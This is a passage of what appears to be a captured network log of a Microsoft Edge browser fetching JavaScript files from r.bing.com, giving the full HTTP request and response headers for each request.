sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 161
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: 6paabdGU2qEZnRtfjHNFcQ==
Last-Modified: Tue, 24 Sep 2024 06:06:16 GMT
ETag: 0x8DCDC5F0026627C
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c9c6f350-101e-004a-0b4e-15daf7000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=218263
Expires: Tue, 08 Oct 2024 04:43:15 GMT
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.9e777b5c.1728144332.192d0cad
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/I_ndi6vVBymh23DuqRe-LcSg9Uk.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/I_ndi6vVBymh23DuqRe-LcSg9Uk.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 275
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: X6fPgOYby704zDvgArarOQ==
Last-Modified: Sun, 02 Jun 2024 10:24:08 GMT
ETag: 0x8DC82EE2311B384
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 13369c3f-801e-0032-4134-1404db000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=97020
Expires: Sun, 06 Oct 2024 19:02:32 GMT
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.9e777b5c.1728144332.192d0d5f
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/ID-70CBAEOXh6Nwxga-CxgpUq4k.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/ID-70CBAEOXh6Nwxga-CxgpUq4k.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 468
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: Hld4hrLTgdOY14/WVAnFqg==
Last-Modified: Tue, 24 Sep 2024 06:08:44 GMT
ETag: 0x8DCDC5F58808E4E
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2005641e-a01e-0053-5e15-16f69f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=303792
Expires: Wed, 09 Oct 2024 04:28:44 GMT
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.9e777b5c.1728144332.192d0dd2
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/sOzNATb8EjFgAA3x7Df1qhIXaNc.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/sOzNATb8EjFgAA3x7Df1qhIXaNc.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 847
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: CoK1U9unv6DA8F0qZCYfAA==
Last-Modified: Tue, 24 Sep 2024 07:05:28 GMT
ETag: 0x8DCDC674551EABE
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1f8f6994-501e-0009-7225-16f01e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=310553
Expires: Wed, 09 Oct 2024 06:21:25 GMT
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.9e777b5c.1728144332.192d0e63
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/JKDfMHWwFo09583bHCYpZTQ4YHE.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/JKDfMHWwFo09583bHCYpZTQ4YHE.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
Origin: https://www.bing.com
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: */*
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: script
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 28527
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: 82kYr0+2JlsfmwE2vnNHQA==
Last-Modified: Fri, 04 Oct 2024 07:28:28 GMT
ETag: 0x8DCE44624361BDC
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b39e8095-501e-0046-785d-163406000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Akamai-GRN: 0.a0901002.1728049847.6b6f6949
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Cache-Control: public, no-transform, max-age=334474
Expires: Wed, 09 Oct 2024 13:00:06 GMT
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.9e777b5c.1728144332.192d0ef1
Timing-Allow-Origin: *
GET

https://r.bing.com/rb/3u/jnc,nj/MVT8kycZ0G8jBgAYbG29BRlRppY.js?bu=Afgd&or=w

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rb/3u/jnc,nj/MVT8kycZ0G8jBgAYbG29BRlRppY.js?bu=Afgd&or=w HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
Origin: https://www.bing.com
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: */*
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: script
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 1464
Content-Type: application/x-javascript; charset=utf-8
Server: Kestrel
Access-Control-Allow-Headers: *
Access-Control-Allow-Origin: *
Content-Encoding: br
Last-Modified: Mon, 23 Sep 2024 23:14:59 GMT
X-EventID: 66ff969fbcec4927b2a60b654e0f8bcb
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
X-AS-InstrumentationOptions: AppServerLoggingMaster=1
X-AS-MACHINENAME: DUBEEAP0000E0B8
X-AS-SuppressSetCookie: 1
Content-Security-Policy-Report-Only: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-4I3njiXl8bvOnWdofiiXQpJRESF6+Kfzy4Is2gzfI+M='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]}
cross-origin-resource-policy: cross-origin
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75}
Cache-Control: public, max-age=313911
Expires: Wed, 09 Oct 2024 07:17:24 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.9e777b5c.1728144333.192d0fcf
Timing-Allow-Origin: *
GET

https://r.bing.com/rp/uxXBTBO1ddKwkiMm_T80NZjeg90.gz.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/uxXBTBO1ddKwkiMm_T80NZjeg90.gz.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
Origin: https://www.bing.com
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: */*
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: script
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 2894
Content-Type: text/javascript; charset=utf-8
Content-Encoding: gzip
Content-MD5: mWa1OUr2kJtK1jmipFLidQ==
Last-Modified: Tue, 24 Sep 2024 07:09:33 GMT
ETag: 0x8DCDC67D7B62A92
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 4f33ada0-301e-0056-3b36-1602e0000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=317701
Expires: Wed, 09 Oct 2024 08:20:34 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.9e777b5c.1728144333.192d137c
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/iY8PAEydb3lbGfuJiuA9ICzXgY8.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/iY8PAEydb3lbGfuJiuA9ICzXgY8.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Last-Modified: Wed, 04 Sep 2024 15:13:12 GMT
ETag: 0x8DCCCF417EEAF26
Akamai-GRN: 0.b4777b5c.1727889429.d574586
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Type: text/javascript; charset=utf-8
Content-MD5: 3vstlq/a5ZcE98e8La1vPw==
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 83990684-701e-0019-4835-ff8417000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Content-Encoding: gzip
Content-Length: 511
Vary: Accept-Encoding
Cache-Control: public, no-transform, max-age=125197
Expires: Mon, 07 Oct 2024 02:52:27 GMT
Date: Sat, 05 Oct 2024 16:05:50 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.9e777b5c.1728144350.192d146a
Timing-Allow-Origin: *
GET

https://r.bing.com/rp/O-ejpxJOK4ur1-qUtpPRk7Z6wj0.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/O-ejpxJOK4ur1-qUtpPRk7Z6wj0.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 401
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: SBAFdM5FfKl3Pa3F9r4h7Q==
Last-Modified: Tue, 24 Sep 2024 06:17:35 GMT
ETag: 0x8DCDC60951168B3
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2c01515c-b01e-0047-562d-1635fb000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=314017
Expires: Wed, 09 Oct 2024 07:19:27 GMT
Date: Sat, 05 Oct 2024 16:05:50 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.9e777b5c.1728144350.192d7bab
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rb/4O/jnc,nj/WjC77O8uVx9--UZpQC4Qfpa7qaE.js?bu=A_Y2-Tb8Ng&or=w

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rb/4O/jnc,nj/WjC77O8uVx9--UZpQC4Qfpa7qaE.js?bu=A_Y2-Tb8Ng&or=w HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 1133
Content-Type: application/x-javascript; charset=utf-8
Server: Kestrel
Access-Control-Allow-Headers: *
Access-Control-Allow-Origin: *
Content-Encoding: br
Last-Modified: Thu, 03 Oct 2024 00:27:16 GMT
X-EventID: 66fe4de6aec440b7aec0e57861b0b4b2
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
X-AS-InstrumentationOptions: AppServerLoggingMaster=1
X-AS-MACHINENAME: DUBEEAP00017299
X-AS-SuppressSetCookie: 1
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-wOh7Tbf15iNeeG5vxaaE6/mEv+0faZPQWE/ttR0MeSU='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]}
cross-origin-resource-policy: cross-origin
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75}
Cache-Control: public, max-age=229760
Expires: Tue, 08 Oct 2024 07:54:50 GMT
Date: Sat, 05 Oct 2024 16:05:30 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a1777b5c.1728144330.25938e7
Timing-Allow-Origin: *
GET

https://r.bing.com/rs/6s/ke/jnc,nj/A4dBY6gAfiTsvXYChf4nbN0dONk.js?or=w

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rs/6s/ke/jnc,nj/A4dBY6gAfiTsvXYChf4nbN0dONk.js?or=w HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 178
Content-Type: application/x-javascript; charset=utf-8
Server: Kestrel
Access-Control-Allow-Headers: *
Access-Control-Allow-Origin: *
Content-Encoding: gzip
Last-Modified: Mon, 23 Sep 2024 22:56:03 GMT
X-EventID: 66fe4fc7bd6e4eebad96ef11d196518f
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
X-AS-InstrumentationOptions: AppServerLoggingMaster=1
X-AS-MACHINENAME: DUBEEAP0000E039
X-AS-SuppressSetCookie: 1
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-aBo0v/uJbD58hdhrLf7f4DSJE1U9R3UUC94qusi4j8o='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]}
cross-origin-resource-policy: cross-origin
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75}
Cache-Control: public, max-age=230264
Expires: Tue, 08 Oct 2024 08:03:15 GMT
Date: Sat, 05 Oct 2024 16:05:31 GMT
Connection: keep-alive
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a1777b5c.1728144331.25938fe
Timing-Allow-Origin: *
GET

https://r.bing.com/rp/QhINJ5aAulL1ot_r_8dLH_aIfCk.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/QhINJ5aAulL1ot_r_8dLH_aIfCk.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset=utf-8
Content-MD5: Udx529Zy6uZ+LObiXq+Upw==
Last-Modified: Wed, 17 Aug 2022 05:56:22 GMT
ETag: 0x8DA8015365BB90D
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 93013fbb-201e-0014-45fc-104cc3000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Content-Encoding: gzip
Content-Length: 258
Cache-Control: public, no-transform, max-age=132073
Expires: Mon, 07 Oct 2024 04:46:44 GMT
Date: Sat, 05 Oct 2024 16:05:31 GMT
Connection: keep-alive
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a1777b5c.1728144331.2593b6d
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/kdaXFKcmbJ_ZSIFJtGtj5iaX3Rs.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/kdaXFKcmbJ_ZSIFJtGtj5iaX3Rs.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 2385
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: yv1o3px24LghjlwhG91WGA==
Last-Modified: Thu, 01 Aug 2024 08:00:19 GMT
ETag: 0x8DCB1FFFCADDD05
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b711ec49-f01e-005a-8077-f4624b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=101719
Expires: Sun, 06 Oct 2024 20:20:50 GMT
Date: Sat, 05 Oct 2024 16:05:31 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a1777b5c.1728144331.2593cdd
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/TaNyfCzxqBX9l7QZbgZUegopTuI.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/TaNyfCzxqBX9l7QZbgZUegopTuI.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 932
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: 4vFQ72ZNf8ORyGv0/A7BUA==
Last-Modified: Tue, 24 Sep 2024 06:26:40 GMT
ETag: 0x8DCDC61D9BDA003
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9d961b2a-a01e-0058-3d94-16eeeb000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
